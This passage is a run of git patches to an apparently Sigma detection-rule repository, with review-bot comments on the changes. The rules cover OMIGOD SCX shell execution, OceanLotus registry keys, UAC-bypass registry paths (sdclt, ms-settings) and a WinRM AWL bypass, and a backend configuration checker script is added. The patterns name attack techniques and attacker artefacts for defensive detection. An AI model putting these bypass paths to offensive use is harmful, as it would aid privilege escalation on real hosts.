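Review bot: The description on the added line reads `... Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite` where the period after `Operations Manager` should be a comma, otherwise the product list is cut into two sentences. The selection keys on `cwd: '/var/opt/microsoft/scx/tmp'`, `uid: '0'` and `comm: 'sh'`, so every root shell the SCX agent spawns from that directory matches, including the legitimate management tasks the falsepositives entry alludes to; a comment on `selection` noting that this breadth is deliberate would help whoever tunes it. The trailing empty added line after `level:` is not needed.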
From c17104b2eb8dcc4be6da7f0aa1e9621f5dc53c1f Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Fri, 17 Sep 2021 04:30:17 -0400 Subject: [PATCH 0964/1367] updated level to high --- .../lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index d9f579cf..82f0a63e 100644 --- a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml @@ -28,5 +28,5 @@ detection: condition: selection falsepositives: - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. -level: Medium +level: high From 260578dcebbbe23ff5f4634b9ed8f43890df4fe8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 17 Sep 2021 14:29:19 +0200 Subject: [PATCH 0965/1367] fix: wrong modified field --- .../lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml index 82f0a63e..d98c1a54 100644 --- a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml 
@@ -3,7 +3,6 @@ id: 045b5f9c-49f7-4419-a236-9854fb3c827a description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. status: experimental date: 2021/09/17 -modified: 2019/09/17 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.privilege_escalation From a1222c7716cf58fba03e10278d7a80674f674e33 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:50:30 +0200 Subject: [PATCH 0966/1367] Update sysmon_apt_oceanlotus_registry --- .../sysmon_apt_oceanlotus_registry.yml | 35 ++++++++++--------- 1 file changed, 19 insertions(+), 16 deletions(-) diff --git a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml index d726d245..cd6eefdb 100755 --- a/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml +++ b/rules/windows/registry_event/sysmon_apt_oceanlotus_registry.yml 
@@ -4,39 +4,42 @@ status: experimental description: Detects registry keys created in OceanLotus (also known as APT32) attacks references: - https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/ + - https://github.com/eset/malware-ioc/tree/master/oceanlotus tags: - attack.defense_evasion - attack.t1112 author: megan201296, Jonhnathan Ribeiro date: 2019/04/14 -modified: 2021/09/13 +modified: 2021/09/17 logsource: category: registry_event product: windows detection: - selection: - TargetObject: - - 'HKCU\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + ioc_1: + TargetObject: 'HKCU\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + ioc_2: + TargetObject|startswith: + - HKCU\SOFTWARE\App\ + - HKLM\SOFTWARE\App\ + TargetObject|contains: + - AppXbf13d4ea2945444d8b13e2121cb6b663\ + - AppX70162486c7554f7f80f481985d67586d\ + - AppX37cc7fdccd644b4f85f4b22d5a3f105a\ TargetObject|endswith: - # covers HKU\* and HKLM.. - - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\Application' - - '\SOFTWARE\App\AppXbf13d4ea2945444d8b13e2121cb6b663\DefaultIcon' - - '\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\Application' - - '\SOFTWARE\App\AppX70162486c7554f7f80f481985d67586d\DefaultIcon' - - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\Application' - - '\SOFTWARE\App\AppX37cc7fdccd644b4f85f4b22d5a3f105a\DefaultIcon' + - Application + - DefaultIcon selection2: TargetObject|startswith: - 'HKCU\' TargetObject|contains: # HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\ - - '_Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' + - 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\' # HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\ - - '_Classes\AppX3bbba44c6cae4d9695755183472171e2\' + - 'Classes\AppX3bbba44c6cae4d9695755183472171e2\' # HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\ - - '_Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\' - - 
'_Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' - condition: selection or selection2 + - 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\' + - 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model' + condition: ioc_1 or ioc_2 or selection2 falsepositives: - Unknown level: critical From d22382d0b998fc0614dde3af0fe3f1f397853aa4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:52:40 +0200 Subject: [PATCH 0967/1367] fix detection --- .../sysmon_registry_persistence_key_linking.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml index 34447d11..2e2d8bef 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml @@ -6,7 +6,7 @@ references: - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ author: Kutepov Anton, oscd.community date: 2019/10/23 -modified: 2019/11/07 +modified: 2021/09/17 tags: - attack.persistence - attack.t1122 # an old one @@ -19,7 +19,7 @@ detection: EventType: 'CreateKey' # don't want DeleteKey events TargetObject|contains|all: - 'HKU\' - - '_Classes\CLSID\' + - 'Classes\CLSID\' - '\TreatAs' condition: selection falsepositives: From 509a4c2822ad7b8e724a4d5c5c04bc752b43b112 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:54:50 +0200 Subject: [PATCH 0968/1367] fix detection --- rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml index f05853b8..01c56658 100755 --- a/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml 
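Review bot: `ioc_1` is fully subsumed by `selection2`: its exact value `HKCU\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model` starts with `HKCU\` and contains `Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model`, which is exactly selection2's last entry, so one of the two can be dropped and the condition shortened to `condition: ioc_2 or selection2`. Replacing `_Classes\` with `Classes\` in the contains-patterns is a pure widening (the old substring still contains the new one), so the `HKU\<SID>_Classes\` form, if Sysmon still reports it, is not lost; a comment on `selection2` stating that both `HKCU\Software\Classes\` and the `_Classes` hive form are intended would document the choice.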
+++ b/rules/windows/registry_event/sysmon_uac_bypass_sdclt.yml @@ -7,17 +7,15 @@ references: - https://github.com/hfiref0x/UACME author: Omer Yampel, Christian Burkard date: 2017/03/17 -modified: 2021/08/31 +modified: 2021/09/17 logsource: category: registry_event product: windows detection: selection1: - # usrclass.dat is mounted on HKU\USERSID_Classes\... - TargetObject|startswith: 'HKU\' - TargetObject|endswith: '_Classes\exefile\shell\runas\command\isolatedCommand' + TargetObject|endswith: Software\Classes\exefile\shell\runas\command\isolatedCommand selection2: - TargetObject|endswith: '-1???_Classes\Folder\shell\open\command\SymbolicLinkValue' + TargetObject|endswith: Software\Classes\Folder\shell\open\command\SymbolicLinkValue Details|contains: '-1???\Software\Classes\' condition: 1 of selection* tags: From 81bf864d94379ec2ae2ac28593d199e5fd8f3a79 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 17 Sep 2021 19:56:26 +0200 Subject: [PATCH 0969/1367] fix detection --- .../registry_event/sysmon_uac_bypass_shell_open.yml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 032e1146..9b2cf67a 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -3,6 +3,7 @@ id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 description: Detects the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) author: Christian Burkard date: 2021/08/30 +modified: 2021/09/17 status: experimental references: - https://github.com/hfiref0x/UACME 
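Review bot: Removing `TargetObject|startswith: 'HKU\'` from `selection1` means the new `endswith: Software\Classes\exefile\shell\runas\command\isolatedCommand` also matches the machine-wide `HKLM\Software\Classes\...` key, a write that already needs administrative rights and is not the sdclt per-user bypass; if the user hive is still the target, keep a `TargetObject|startswith:` on `'HKU\'` / `'HKCU\'` alongside the new suffix. The deleted comment explained why `_Classes` was the anchor; a replacement such as `# usrclass.dat is surfaced under ...\Software\Classes\, hence the suffix match` would preserve that reasoning, assuming that is the motivation for the change. The same widening applies to the `Classes\ms-settings\...` suffixes in the following patch (0969, sysmon_uac_bypass_shell_open.yml).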
@@ -17,14 +18,14 @@ logsource: product: windows detection: selection1: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' + TargetObject|endswith: 'Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' selection2: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' + TargetObject|endswith: 'Classes\ms-settings\shell\open\command\DelegateExecute' selection3: TargetObject|endswith: - - '_Classes\ms-settings\shell\open\command\(Default)' - - '_Classes\exefile\shell\open\command\(Default)' + - 'Classes\ms-settings\shell\open\command\(Default)' + - 'Classes\exefile\shell\open\command\(Default)' filter_sel3: Details: '(Empty)' condition: selection1 or selection2 or (selection3 and not filter_sel3) From 407289d30006146c861188f69ceb533ad2ce0dc6 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Sat, 18 Sep 2021 03:50:37 -0400 Subject: [PATCH 0970/1367] Rule to detect the execution of a script via SCX RunAsprovider ExecuteScript --- ...omigod_scx_runasprovider_executescript.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml diff --git a/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml new file mode 100644 index 00000000..a760be6d --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executescript.yml 
@@ -0,0 +1,33 @@ +title: OMIGOD SCX RunAsProvider ExecuteScript +id: 865c10a6-9541-4d11-9f45-9a3484e23b0a +description: Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. +status: experimental +date: 2021/09/18 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.execution + - attack.t1068 + - attack.t1190 + - attack.t1203 +references: + - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure + - https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/ + - https://github.com/Azure/Azure-Sentinel/pull/3071/files +logsource: + product: linux + service: auditd +detection: + selection: + type: 'SYSCALL' + SYSCALL: 'execve' + uid: '0' + cwd: '/var/opt/microsoft/scx/tmp' + cmdline|contains: /etc/opt/microsoft/scx/conf/tmpdir/scx + comm: 'sh' + condition: selection +falsepositives: + - Legitimate use of SCX RunAsProvider ExecuteScript. +level: high + From 5081c210b7bc537121bfaf5c134392c87257c654 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:51:05 +0200 Subject: [PATCH 0971/1367] add simple script --- tools/sigma/sigma_configurations_check.py | 56 +++++++++++++++++++++++ tools/sigma_configurations_check | 5 ++ 2 files changed, 61 insertions(+) create mode 100644 tools/sigma/sigma_configurations_check.py create mode 100644 tools/sigma_configurations_check 
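Review bot: `cmdline|contains: /etc/opt/microsoft/scx/conf/tmpdir/scx` relies on a `cmdline` field that a raw auditd SYSCALL record does not carry (the execve arguments arrive in a separate EXECVE record as a0..aN), so whether this line ever matches depends on the collector's enrichment; a comment naming the expected field source, e.g. `# cmdline requires an enriched auditd source that joins the EXECVE record`, would make the dependency explicit. The description repeats the `Operations Manager. Microsoft Azure` punctuation slip from the ExecuteShellCommand rule (period should be a comma). Quoting is inconsistent within `selection` (`'0'`, `'sh'` quoted, the `cmdline` value bare), and the trailing empty added line after `level:` is not needed.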
diff --git a/tools/sigma/sigma_configurations_check.py b/tools/sigma/sigma_configurations_check.py new file mode 100644 index 00000000..6ab6924e --- /dev/null +++ b/tools/sigma/sigma_configurations_check.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python3 +# A simple Sigma Configurations checker +# Copyright frack113 + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. + +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . + +import sigma.backends.discovery as backends +import ruamel.yaml +from pathlib import Path + +def main(): + list_backend =[] + for backend in sorted(backends.getBackendList(), key=lambda backend: backend.identifier): + list_backend.append(backend.identifier) + + print(f"Valid backend name are {list_backend}") + print('result tab:') + print('|Name file|Backend|check') + print('|---|---|---') + + valid = 0 + empty = 0 + faulty = 0 + yml_files =Path('config/').glob("*.yml") + for yml in yml_files: + with yml.open("r",encoding="UTF-8") as f: + data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader) + if 'backends' in data: + for backend in data['backends']: + if backend in list_backend: + print(f"|{yml.name:45} | {backend:30} | OK ") + valid += 1 + else: + print(f"|{yml.name:45} | {backend:30} | NOK") + faulty += 1 + else: + msg = "no backend set" + print(f"|{yml.name:45} | {msg:30} | - ") + empty += 1 + + print('Summary') + print(f'Valid : {valid} Invalid : {faulty} No Backend : {empty}') + +if __name__ == "__main__": + main() 
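Review bot: `data = ruamel.yaml.load(f, Loader=ruamel.yaml.RoundTripLoader)` returns `None` for an empty config file, so the following `if 'backends' in data:` raises `TypeError`; `if data and 'backends' in data:` keeps the script going and counts the file under `empty`. The `Path('config/')` glob is relative to the current working directory, so the script only finds the configs when run from `tools/`; deriving the directory from `Path(__file__).parent.parent / 'config'` or exposing it as an option (unless the follow-up options patch already does) makes the `tools/sigma_configurations_check` wrapper usable from anywhere. The `list_backend` build is a plain append loop and reads better as `list_backend = [b.identifier for b in sorted(backends.getBackendList(), key=lambda b: b.identifier)]`; `ruamel.yaml.load` with a `Loader=` argument is the legacy API and emits a deprecation warning in current ruamel releases.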
diff --git a/tools/sigma_configurations_check b/tools/sigma_configurations_check new file mode 100644 index 00000000..871d3713 --- /dev/null +++ b/tools/sigma_configurations_check @@ -0,0 +1,5 @@ +#!/usr/bin/env python3 + +from sigma.sigma_configurations_check import main + +main() From 365db5abbc371d5acc186aa7db21d08dd704879a Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:54:08 +0200 Subject: [PATCH 0972/1367] fix bad elasticsearch-rule --- tools/config/ecs-auditd.yml | 1 - tools/config/ecs-dns.yml | 2 +- tools/config/ecs-filebeat.yml | 1 - tools/config/ecs-zeek-corelight.yml | 2 +- tools/config/ecs-zeek-elastic-beats-implementation.yml | 1 - tools/config/logstash-zeek-default-json.yml | 2 +- tools/config/winlogbeat-modules-enabled.yml | 1 - 7 files changed, 3 insertions(+), 7 deletions(-) diff --git a/tools/config/ecs-auditd.yml b/tools/config/ecs-auditd.yml index c5c9a0cc..00c1c939 100644 --- a/tools/config/ecs-auditd.yml +++ b/tools/config/ecs-auditd.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers logsources: diff --git a/tools/config/ecs-dns.yml b/tools/config/ecs-dns.yml index aaa8e636..c0c1f53b 100644 --- a/tools/config/ecs-dns.yml +++ b/tools/config/ecs-dns.yml @@ -3,7 +3,7 @@ order: 20 backends: - es-qs - es-dsl - - elasticsearch-rule + - es-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/ecs-filebeat.yml b/tools/config/ecs-filebeat.yml index dd85cc7a..17d9990d 100644 --- a/tools/config/ecs-filebeat.yml +++ b/tools/config/ecs-filebeat.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers defaultindex: filebeat-* diff --git a/tools/config/ecs-zeek-corelight.yml b/tools/config/ecs-zeek-corelight.yml index 5bf7dab3..8fd59d94 100644 --- a/tools/config/ecs-zeek-corelight.yml +++ b/tools/config/ecs-zeek-corelight.yml 
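Review bot: The `elasticsearch-rule` entry is handled two different ways across this commit: it is deleted outright in ecs-auditd.yml, ecs-filebeat.yml and winlogbeat-modules-enabled.yml but renamed to `es-rule` in ecs-dns.yml, ecs-zeek-corelight.yml and logstash-zeek-default-json.yml, so the first group loses the backend unless `es-rule` is already listed above the hunk (as it visibly is in ecs-zeek-elastic-beats-implementation.yml). Worth confirming for each of the three deletions, and the commit message could state that `es-rule` is the identifier the checker script accepts. `corelight_elasticsearch-rule` is left untouched in ecs-zeek-corelight.yml; if it follows the same naming as the removed entry it may need the same treatment.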
@@ -5,7 +5,7 @@ backends: - es-qs - corelight_es-qs - es-dsl - - elasticsearch-rule + - es-rule - corelight_elasticsearch-rule - kibana - kibana-ndjson diff --git a/tools/config/ecs-zeek-elastic-beats-implementation.yml b/tools/config/ecs-zeek-elastic-beats-implementation.yml index c79b4e89..9aeae994 100644 --- a/tools/config/ecs-zeek-elastic-beats-implementation.yml +++ b/tools/config/ecs-zeek-elastic-beats-implementation.yml @@ -4,7 +4,6 @@ backends: - es-qs - es-dsl - es-rule - - elasticsearch-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/logstash-zeek-default-json.yml b/tools/config/logstash-zeek-default-json.yml index e6b1d14e..c4332f32 100644 --- a/tools/config/logstash-zeek-default-json.yml +++ b/tools/config/logstash-zeek-default-json.yml @@ -3,7 +3,7 @@ order: 20 backends: - es-qs - es-dsl - - elasticsearch-rule + - es-rule - kibana - kibana-ndjson - xpack-watcher diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index e43f5ef5..d46dd205 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -11,7 +11,6 @@ backends: - xpack-watcher - elastalert - elastalert-dsl - - elasticsearch-rule - ee-outliers logsources: windows: From 72d301ba206b8de2a1efe4cd27f9be7ae29a3022 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 15:55:01 +0200 Subject: [PATCH 0973/1367] remove bad cb --- tools/config/carbon-black-eedr.yml | 1 - tools/config/carbon-black.yml | 1 - 2 files changed, 2 deletions(-) diff --git a/tools/config/carbon-black-eedr.yml b/tools/config/carbon-black-eedr.yml index 0e7c4fff..ae17afb8 100644 --- a/tools/config/carbon-black-eedr.yml +++ b/tools/config/carbon-black-eedr.yml @@ -2,7 +2,6 @@ title: CarbonBlack Enterprise EDR order: 20 backends: - carbonblack - - cb fieldmappings: AccountName: - process_username 
diff --git a/tools/config/carbon-black.yml b/tools/config/carbon-black.yml index aaf7ae18..56e33f8e 100644 --- a/tools/config/carbon-black.yml +++ b/tools/config/carbon-black.yml @@ -2,7 +2,6 @@ title: CarbonBlack field mapping order: 20 backends: - carbonblack - - cb fieldmappings: AccountName: username CommandLine: cmdline From 88a59be69c2e8fbd00ef26762ee909b1ff012f04 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 18 Sep 2021 18:13:16 +0200 Subject: [PATCH 0974/1367] Add options and return error code --- tools/sigma/sigma_configurations_check.py | 85 ++++++++++++++++------- 1 file changed, 59 insertions(+), 26 deletions(-) diff --git a/tools/sigma/sigma_configurations_check.py b/tools/sigma/sigma_configurations_check.py index 6ab6924e..80d52d6b 100644 --- a/tools/sigma/sigma_configurations_check.py +++ b/tools/sigma/sigma_configurations_check.py 
@@ -18,39 +18,72 @@
 import sigma.backends.discovery as backends
 import ruamel.yaml
 from pathlib import Path
-
+from argparse import ArgumentParser
+import sys
+import csv
+
 def main():
+ argparser = ArgumentParser(description="A simple Sigma Configurations checker")
+ argparser.add_argument("--verify", "-V", action="store_true", help="Verify if configuration file have valid backend name")
+ argparser.add_argument("--sumary", "-s", action="store_true", help="Give some information.")
+ argparser.add_argument("--error", "-e", action="store_true", help="Exit with error code 10 on verification failures.")
+ argparser.add_argument("--output", "-o", default=None, help="Output csv file")
+ args = argparser.parse_args()
+
+ passed = True
+
 list_backend =[]
 for backend in sorted(backends.getBackendList(), key=lambda backend: backend.identifier):
 list_backend.append(backend.identifier)
 
- print(f"Valid backend name are {list_backend}")
- print('result tab:')
- print('|Name file|Backend|check')
- print('|---|---|---')
+ if args.sumary:
+ print(f"Backend found :\n{list_backend}\n")
 
- valid = 0
- empty = 0
- faulty = 0
- yml_files =Path('config/').glob("*.yml")
- for yml in yml_files:
- with yml.open("r",encoding="UTF-8") as f:
- data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader)
- if 'backends' in data:
- for backend in data['backends']:
- if backend in list_backend:
- print(f"|{yml.name:45} | {backend:30} | OK ")
- valid += 1
- else:
- print(f"|{yml.name:45} | {backend:30} | NOK")
- faulty += 1
- else:
- msg = "no backend set"
- print(f"|{yml.name:45} | {msg:30} | - ")
- empty += 1
+ if args.verify:
+ csv_lst = []
+ valid = 0
+ empty = 0
+ faulty = 0
+ yml_files =Path('config/').glob("*.yml")
+ for yml in yml_files:
+ print(f"Check configurations file : {yml.name}")
+ with yml.open("r",encoding="UTF-8") as f:
+ data = ruamel.yaml.load(f,Loader=ruamel.yaml.RoundTripLoader)
+ if 'backends' in data:
+ for backend in data['backends']:
+ if backend in list_backend:
+ csv_lst.append([yml.name,backend,'OK'])
+ valid += 1
+ else:
+ csv_lst.append([yml.name,backend,'NOK'])
+ faulty += 1
+ passed = False
+ else:
+ csv_lst.append([yml.name,"no backends section",'-'])
+ empty += 1
+ #passed = False
+ #Should not be but not sure
+
+ if args.sumary:
+ print('-------')
+ print('Summary')
+ print(f'Valid backend name: {valid}\nInvalid backend name: {faulty}\nFile with no Backend: {empty}')
+ print('-------')
 
- print('Summary')
- print(f'Valid : {valid} Invalid : {faulty} No Backend : {empty}')
+ if args.output:
+ with open(args.output, 'w', newline='') as csvfile:
+ spamwriter = csv.writer(csvfile, delimiter=';',quotechar='|', quoting=csv.QUOTE_MINIMAL)
+ spamwriter.writerow(['Configurations Name','Backend Name','Result'])
+ for row in csv_lst:
+ spamwriter.writerow(row)
+
+ if not passed:
+ print("**************************************")
+ print("Some Configurations file are not valid")
+ print("**************************************")
+ if args.error:
+ exit(10)
+
 
 if __name__ == "__main__":
 main()
From 7d000f2b1d39bfbb5e5305af69537d498077c42b Mon Sep 17 00:00:00 2001
From: frack113
Date: Sun, 19 Sep 2021 09:41:17 +0200
Subject: [PATCH 0975/1367] split win_susp_winrm_AWL_bypass.yml
---
 .../file_event_winrm_AWL_bypass.yml | 31 +++++++++++++++++++
 .../win_susp_winrm_AWL_bypass.yml | 26 +++-------------
 2 files changed, 36 insertions(+), 21 deletions(-)
 create mode 100644 rules/windows/file_event/file_event_winrm_AWL_bypass.yml
diff --git a/rules/windows/file_event/file_event_winrm_AWL_bypass.yml b/rules/windows/file_event/file_event_winrm_AWL_bypass.yml
new file mode 100644
index 00000000..572c319f
--- /dev/null
+++ b/rules/windows/file_event/file_event_winrm_AWL_bypass.yml
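Review bot: `exit(10)` near the end of the hunk calls the site-module helper rather than `sys.exit(10)`; `sys` is imported at the top of the hunk but never used, and the builtin `exit` is absent when Python runs with `-S` or is embedded, so the `--error` contract would fail exactly where a CI job relies on it. `open(args.output, 'w', newline='')` takes the platform default encoding while the input files are read as UTF-8 — pass `encoding='utf-8'` so file names with non-ASCII characters round-trip in the CSV. The new option is spelled `--sumary` in both the argument and `args.sumary`; since this becomes the command-line interface, fixing it to `--summary` now is cheaper than carrying an alias later.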
@@ -0,0 +1,31 @@ +title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed +related: + - id: 074e0ded-6ced-4ebd-8b4d-53f55908119 + type: derived +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +status: experimental +references: + - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 +author: Julia Fomina, oscd.community +date: 2020/10/06 +modified: 2021/09/19 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: file_event +detection: + system_files: + TargetFilename|endswith: + - 'WsmPty.xsl' + - 'WsmTxt.xsl' + in_system_folder: + TargetFilename|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + condition: system_files and not in_system_folder +level: medium +falsepositives: + - Unlikely \ No newline at end of file diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml index fd21e69f..b9388c7e 100644 --- a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml +++ b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml 
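Review bot: The `related` entry `id: 074e0ded-6ced-4ebd-8b4d-53f55908119` is one character short of a UUID; the process_creation rule it derives from is declared with `id: 074e0ded-6ced-4ebd-8b4d-53f55908119d` in the next hunk, so the trailing `d` was lost and the link will not resolve. Change it to `- id: 074e0ded-6ced-4ebd-8b4d-53f55908119d`. A repository test that every `related` id matches an existing rule id would catch this class of slip, since the same kind of truncation appears again in a later split in this series.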
@@ -1,19 +1,15 @@ -action: global title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) status: experimental references: - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 author: Julia Fomina, oscd.community date: 2020/10/06 +modified: 2021/09/19 tags: - attack.defense_evasion - attack.t1216 -level: medium -falsepositives: - - Unlikely ---- -id: 074e0ded-6ced-4ebd-8b4d-53f55908119d logsource: category: process_creation product: windows @@ -31,18 +27,6 @@ detection: contains_winrm: CommandLine|contains: 'winrm' condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) ---- -id: d353dac0-1b41-46c2-820c-d7d2561fc6ed -logsource: - product: windows - category: file_event -detection: - system_files: - TargetFilename|endswith: - - 'WsmPty.xsl' - - 'WsmTxt.xsl' - in_system_folder: - TargetFilename|startswith: - - 'C:\Windows\System32\' - - 'C:\Windows\SysWOW64\' - condition: system_files and not in_system_folder +level: medium +falsepositives: + - Unlikely \ No newline at end of file From 416b0556b18cd61c78c12c91b6008c047335720d Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 10:02:05 +0200 Subject: [PATCH 0976/1367] split win_silenttrinity_stage_use.yml --- .../image_load_silenttrinity_stage_use.yml | 27 +++++++++++++++++++ .../win_silenttrinity_stage_use.yml | 19 +++++-------- 2 files changed, 33 insertions(+), 13 deletions(-) create mode 100644 rules/windows/image_load/image_load_silenttrinity_stage_use.yml diff --git a/rules/windows/image_load/image_load_silenttrinity_stage_use.yml b/rules/windows/image_load/image_load_silenttrinity_stage_use.yml new file 